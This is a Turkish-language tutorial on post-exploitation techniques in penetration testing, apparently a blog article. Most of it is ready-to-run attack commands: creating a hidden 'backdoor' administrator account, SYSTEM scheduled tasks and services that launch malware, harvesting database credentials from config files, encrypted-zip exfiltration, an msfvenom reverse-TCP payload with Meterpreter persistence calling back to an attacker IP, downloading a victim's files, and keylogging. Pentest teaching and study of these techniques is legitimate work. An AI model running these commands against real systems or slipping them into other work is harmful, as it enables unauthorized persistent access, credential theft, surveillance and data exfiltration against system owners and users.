Penetrasyon testlerinin önemli bir aşaması olan post-exploitation (istismar sonrası) süreçleri, sisteme giriş sağlandıktan sonra gerçekleştirilen eylemleri kapsar. Bu aşamanın temel amacı, sistemdeki varlığı pekiştirmek, daha fazla bilgi toplamak ve gerekirse sistemin kontrolünü uzun süre elinizde tutabilmektir. Bu makalede, post-exploitation teknikleri, bunların uygulanma yöntemleri ve örnek bir kullanım senaryosu ele alınacaktır.

Sistemde Erişimi Koruma Yöntemleri

Kullanıcı Hesaplarının Manipülasyonu

Sisteme erişim sağladıktan sonra, kalıcı bir varlık sağlamak için mevcut kullanıcı hesaplarını değiştirme veya yeni hesaplar oluşturma yaygın kullanılan yöntemlerdendir.

• Mevcut Hesapların Ele Geçirilmesi: Kullanıcı parolalarının değiştirilmesi ya da oturum bilgilerinin çalınması.
• Yeni Kullanıcı Hesapları Oluşturma: Yetkili bir kullanıcı hesabı oluşturarak gerektiğinde sisteme geri dönmeyi sağlar. Örnek bir komut:

  net user backdoor P@ssw0rd /add
  net localgroup administrators backdoor /add

Kalıcı Backdoor Mekanizmaları

Sistemde bir arka kapı oluşturmak, post-exploitation aşamasında sıkça kullanılan bir diğer yöntemdir.

• Startup Scripts: Arka kapı bağlantılarının her sistem yeniden başlatıldığında aktif hale gelmesi için başlangıç betiklerine eklenmesi.
• Scheduled Tasks: Görev zamanlayıcı ile belirli aralıklarla çalışan arka kapılar oluşturma.

  schtasks /create /tn "Backdoor" /tr "C:\\backdoor.exe" /sc minute /mo 5 /ru SYSTEM

Sistem Hizmetlerinin Manipülasyonu

Hizmetlerin (services) ele geçirilmesi, genellikle kalıcı erişim sağlamak için kullanılır.

• Mevcut hizmetleri yeniden yapılandırarak kötü amaçlı yazılımları başlatabilirsiniz.
• Yeni hizmetler oluşturmak veya mevcut hizmetleri manipüle etmek için sc.exe kullanılabilir:

  sc create backdoor_service binPath= "C:\\malware.exe"

Veritabanı Manipülasyonu ve Veri Sızdırma

Post-exploitation aşamasında, özellikle kritik veriler içeren veritabanları hedef alınır. Bu aşamada aşağıdaki adımlar uygulanabilir:

Veritabanı Bağlantı Bilgilerini Toplama

• Veritabanı bağlantı bilgileri genellikle uygulama yapılandırma dosyalarında bulunur.
• Örnek Lokasyonlar:
• web.config (ASP.NET uygulamaları için)
• .env (Laravel veya Node.js tabanlı uygulamalar için)

Veritabanına Bağlantı ve Veri Çekme

• Veritabanına bağlanmak için araçlar (örneğin sqlcmd, psql, MySQL) kullanılabilir.

  SELECT * FROM users;

• Hassas veriler (örneğin kullanıcı bilgileri, parolalar) çekilerek analiz edilir.

Verilerin Exfiltration Teknikleri

• Şifrelenmiş ZIP ile Exfiltration: Veriler sıkıştırılıp şifrelenerek çıkarılır.

  zip -e sensitive_data.zip sensitive_data.csv

• Steganografi Teknikleri: Verilerin, görüntü ya da ses dosyalarının içerisine gizlenmesi.

Örnek Uygulama: Meterpreter ile Kalıcı Erişim Sağlama

Meterpreter, post-exploitation faaliyetlerinde sıkça kullanılan bir aracıdr. Kalıcı erişim sağlamak için aşağıdaki adımlar ızlenebilir:

Adım 1: Sisteme Bağlantı Sağlama

Meterpreter kullanarak hedef sisteme bağlantı kurulur. Bunun için çoğunlukla önceden hazırlanmış bir zararlı dosya veya exploit kullanılır.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > backdoor.exe

Adım 2: Persistence Modülü Kullanımı

Meterpreter, kalıcılık sağlamak için bir persistence modülü sunar. Bu modül, şu komutlarla etkinleştirilebilir:

run persistence -U -i 10 -p 4444 -r 192.168.1.10

• -U: Kullanıcı girişi yaptığında başlatma.
• -i: Yeniden bağlanma süresi (10 saniye).
• -p: Bağlanılacak port.
• -r: Bağlanılacak uzak sunucu IP adresi.

Adım 3: Verilerin Ele Geçirilmesi

Bağlantı sağlandıktan sonra, şu Meterpreter komutlarıyla hedef sistemde veri toplama işlemleri gerçekleştirilebilir:

• Sistem Bilgisi Toplama:

  sysinfo

• Dosya Transferi:

  download C:\\Users\\victim\\Documents\\sensitive_data.xlsx

• Klavye Kayıtlarını Ele Geçirme:

  keyscan_start

Bu teknikler, post-exploitation sürecindeki stratejik öneme sahiptir.